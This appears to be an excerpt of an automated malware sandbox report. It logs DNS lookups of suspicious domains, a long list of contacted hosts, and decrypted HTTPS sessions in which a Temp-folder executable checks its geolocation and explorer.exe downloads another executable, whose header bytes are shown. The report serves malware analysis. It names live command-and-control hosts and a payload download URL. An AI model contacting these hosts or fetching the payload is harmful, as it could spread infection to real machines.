Oct 13, 2023 15:21:40.732553005 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		175.119.10.231	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732553005 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		185.12.79.25	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732553005 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		187.18.108.158	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732553005 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		201.119.22.36	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732553005 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		201.124.243.137	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732553005 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		115.88.24.200	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732608080 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		211.104.254.139	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732608080 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		14.33.209.147	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732608080 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		211.181.24.132	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732608080 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		95.107.163.44	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732608080 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		175.119.10.231	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732608080 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		185.12.79.25	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732608080 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		187.18.108.158	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732608080 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		201.119.22.36	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732608080 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		201.124.243.137	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732608080 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		115.88.24.200	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732644081 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		211.104.254.139	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732644081 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		14.33.209.147	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732644081 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		211.181.24.132	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732644081 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		95.107.163.44	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732644081 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		175.119.10.231	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732644081 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		185.12.79.25	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732644081 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		187.18.108.158	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732644081 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		201.119.22.36	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732644081 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		201.124.243.137	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:21:40.732644081 CEST	1.1.1.1	192.168.2.5	0xcff9	No error (0)	wirtshauspost.at		115.88.24.200	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:22:05.613089085 CEST	1.1.1.1	192.168.2.5	0xf76d	No error (0)	h171008.srv22.test-hf.su		91.227.16.22	A (IP address)	IN (0x0001)	false
Oct 13, 2023 15:22:05.613301039 CEST	1.1.1.1	192.168.2.5	0xf76d	No error (0)	h171008.srv22.test-hf.su		91.227.16.22	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

eifuabdddkpqwuw.com

onualituyrs.org

api.2ip.ua

alayyadcare.com

montereyclub.org

hoffmanlevi.space

loveperry.org

t.me

uaddiduuimums.net

sumagulituyo.org

cwdmvfiaxmu.com

snukerukeutit.org

ufpeuyakodo.com

lightseinsteniki.org

lpvtpahfwwjp.net

liuliuoumumy.org

optkesddcwy.net

stualialuyastrelia.net

xnccxetdsdn.com

wlryqdewuxolt.com

wbjjifdctbik.net

vnmvcfrmmwyxp.org

jhtwgpnevasgbl.com

pltpgqkyfehuuapg.com

uoxmyfausrwv.com

79.137.192.18

ftgrbdwjdpkto.org

vyjxpgcjgimfj.net

mikolyda.beget.tech

elghphstuoowv.com

zexeq.com

pkihrimfqlxm.org

colisumy.com

kfscgupurlw.net

ouuksaohubralc.net

171.22.28.219

iicqwexgeyapkhiu.org

49.12.118.151:8000

95.214.27.254

tmiatmhvkicwvgsj.net

wirtshauspost.at

jnbbmtefodcma.net

buvcyhynjsncvke.org

jxxbanuhginjdgti.com

okrclxomiyelq.org

oambdydnpnh.com

mokokwjdpagohp.com

wrsjjudrhdvb.com

wanhjopqswbwr.net

ueesavtavjq.com

fdcnxyhgqouymv.org

jjsgauoacblkpyj.net

hgygmxbvgjx.org

sbtsutsysmpvkdp.net

h171008.srv22.test-hf.su

rendbjblnxrkqsr.net

gpksbgtcwkl.net

myafpbintdaaso.com

oagultidefny.org

wbxnmqwfowxba.com

oxjtjsoiibp.com

sofnctwingjx.org

jdummjnjflpwoove.com

qkcxhwfhxqgikr.com

abebdxkhcjhx.com

tutnqwbatqan.com

ljlptbkclgysxs.com

aebmyyueifmwo.net

tdxjqygqduubwd.net

neijvnsyykhrlgji.net

meryphrqmnxayplm.com

elkomhscwov.net

flveilasgbocwt.net

rhkqeqhmjkuqkuy.net

ndjtfljtxoug.net

unselpxuphvee.net

ivdjbblqpgdex.net

stegprusvkfrh.com

gokoxegwyvkkyw.com

eliyaxtdgwh.com

krbebjkegwyss.com

ngrnhwekdbogfhf.net

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49716	91.215.85.209	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-13 13:20:30 UTC	0	OUT	GET / HTTP/1.1 Connection: Keep-Alive Accept: / Referer: http://eifuabdddkpqwuw.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: onualituyrs.org
2023-10-13 13:20:31 UTC	0	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Oct 2023 13:20:31 GMT Content-Type: text/html; charset=utf-8 Content-Length: 2563 Connection: close Vary: Accept-Encoding Last-Modified: Thu, 05 Oct 2023 21:42:15 GMT ETag: "a03-606feff55918f" Accept-Ranges: bytes Vary: Accept-Encoding
2023-10-13 13:20:31 UTC	0	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Coming Soon</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d
2023-10-13 13:20:31 UTC	1	IN	Data Raw: 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 73 75 63 63 65 73 73 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 61 62 61 34 37 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 35 61 62 61 34 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 69 63 6f 6e 2d 6c 61 72 67 65 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 33 32 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 64 65 73 63 72 69 70 74 69 6f 6e 2d 74 65 78 74 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 30 37 30 37 30 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 31 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 35 65 6d 3b 0a 09 09 Data Ascii: lor: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707070;letter-spacing: -0.01em;font-size: 1.25em;
2023-10-13 13:20:31 UTC	2	IN	Data Raw: 66 6f 6f 74 65 72 22 3e 3c 73 74 72 6f 6e 67 3e 44 6f 6d 61 69 6e 3a 3c 2f 73 74 72 6f 6e 67 3e 20 6f 6e 75 61 6c 69 74 75 79 72 73 2e 6f 72 67 3c 2f 73 65 63 74 69 6f 6e 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: footer"><strong>Domain:</strong> onualituyrs.org</section></div></div></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49723	172.67.139.220	443	C:\Users\user\AppData\Local\Temp\958B.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-13 13:20:56 UTC	2	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-10-13 13:20:56 UTC	3	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 13 Oct 2023 13:20:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TuW2hio70wWX7hjqEezoemat0QVj2rvuCB0%2Bn262BEytWx%2FWiJEF0irppvx8pjbLcZPMFT1q0nVO%2BR3qLmfYcLua3DdsYxpxaDXVVV5u5WQZIxTEIp30iRKc4GuC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8157e20089fe529b-LAX alt-svc: h3=":443"; ma=86400
2023-10-13 13:20:56 UTC	3	IN	Data Raw: 33 32 66 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 36 66 30 37 30 61 30 33 31 66 32 66 35 64 30 36 31 66 34 31 30 32 30 61 35 30 31 63 31 61 30 64 30 35 30 61 30 63 Data Ascii: 32f<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#6f070a031f2f5d061f41020a501c1a0d050a0c
2023-10-13 13:20:56 UTC	4	IN	Data Raw: d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 61 37 63 66 63 32 63 62 64 37 65 37 39 35 63 65 64 37 38 39 64 32 63 36 39 38 64 34 64 32 63 35 63 64 63 32 63 34 64 33 39 61 39 35 63 65 64 37 38 39 64 32 63 36 22 3e Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#a7cfc2cbd7e795ced789d2c698d4d2c5cdc2c4d39a95ced789d2c6">
2023-10-13 13:20:56 UTC	4	IN	Data Raw: 36 63 0d 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a Data Ascii: 6c<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script>
2023-10-13 13:20:56 UTC	4	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.5	49756	172.67.139.220	443	C:\Users\user\AppData\Local\Temp\958B.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-13 13:21:21 UTC	11799	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-10-13 13:21:22 UTC	11799	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 13 Oct 2023 13:21:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Qdmprv1JJ9lx9gAkHY5umzcZH%2BFqEsv%2Flgrd3PDyxpH3p1OATJnFp1%2Bob9t443MqGYq4XxcFJZclAKIVJgC%2B1UXQlW1Tm6ebMFx5y5Zn7KF3Cdh5sJwpyGmTGyKC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8157e29ea9402ebf-LAX alt-svc: h3=":443"; ma=86400
2023-10-13 13:21:22 UTC	11800	IN	Data Raw: 33 39 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 64 34 62 63 62 31 62 38 61 34 39 34 65 36 62 64 61 34 66 61 62 39 62 31 65 62 61 37 61 31 62 36 62 65 62 31 62 37 Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#d4bcb1b8a494e6bda4fab9b1eba7a1b6beb1b7
2023-10-13 13:21:22 UTC	11801	IN	Data Raw: ba 20 d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 37 32 31 61 31 37 31 65 30 32 33 32 34 30 31 62 30 32 35 63 30 37 31 33 34 64 30 31 30 37 31 30 31 38 31 37 31 31 30 36 34 66 34 30 31 62 30 32 35 63 30 37 31 33 Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#721a171e0232401b025c07134d010710181711064f401b025c0713
2023-10-13 13:21:22 UTC	11801	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49729	172.67.139.220	443	C:\Users\user\AppData\Local\Temp\958B.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-13 13:21:04 UTC	4	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-10-13 13:21:05 UTC	5	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 13 Oct 2023 13:21:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ky6MaXYqME66ebqWRNkxSW%2Bh0dID5QkXpgD36ePSMUQfaI12sm6RLDbAI%2F%2BBGRAU2k1EL3%2FGuMXCZ9m9xs%2BSE1fdb8jmQso0gK9rJYGEgrDkktXQd7r5MLZeiQ7s"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8157e234ef927e9c-LAX alt-svc: h3=":443"; ma=86400
2023-10-13 13:21:05 UTC	6	IN	Data Raw: 33 39 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 61 62 63 33 63 65 63 37 64 62 65 62 39 39 63 32 64 62 38 35 63 36 63 65 39 34 64 38 64 65 63 39 63 31 63 65 63 38 Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#abc3cec7dbeb99c2db85c6ce94d8dec9c1cec8
2023-10-13 13:21:05 UTC	6	IN	Data Raw: 20 d0 ba 20 d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 66 36 39 65 39 33 39 61 38 36 62 36 63 34 39 66 38 36 64 38 38 33 39 37 63 39 38 35 38 33 39 34 39 63 39 33 39 35 38 32 63 62 63 34 39 66 38 36 64 38 38 33 Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#f69e939a86b6c49f86d88397c98583949c939582cbc49f86d883
2023-10-13 13:21:05 UTC	6	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49730	213.6.54.58	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-13 13:21:05 UTC	4	OUT	GET /tmp/index.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: alayyadcare.com
2023-10-13 13:21:06 UTC	6	IN	HTTP/1.1 200 OK Date: Fri, 13 Oct 2023 13:21:05 GMT Server: Apache Content-Description: File Transfer Content-Disposition: attachment; filename=c6d22814.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Connection: close Transfer-Encoding: chunked Content-Type: application/octet-stream
2023-10-13 13:21:06 UTC	7	IN	Data Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 75 03 0d 8d 31 62 63 de 31 62 63 de 31 62 63 de 2f 30 e7 de 1c 62 63 de 2f 30 f6 de 27 62 63 de 2f 30 e0 de b3 62 63 de 16 a4 18 de 36 62 63 de 31 62 62 de b9 62 63 de 2f 30 e9 de 30 62 63 de 2f 30 f7 de 30 62 63 de 2f 30 f2 de 30 62 63 de 52 69 63 68 31 62 63 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 80 Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$u1bc1bc1bc/0bc/0'bc/0bc6bc1bbbc/00bc/00bc/00bcRich1bcPEL
2023-10-13 13:21:06 UTC	14	IN	Data Raw: 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 48 48 3a 6d 6d 3a 73 73 00 00 00 00 64 64 64 64 2c 20 4d 4d 4d 4d 20 Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{\|}~HH:mm:ssdddd, MMMM
2023-10-13 13:21:06 UTC	15	IN	Data Raw: 0d 0a Data Ascii:
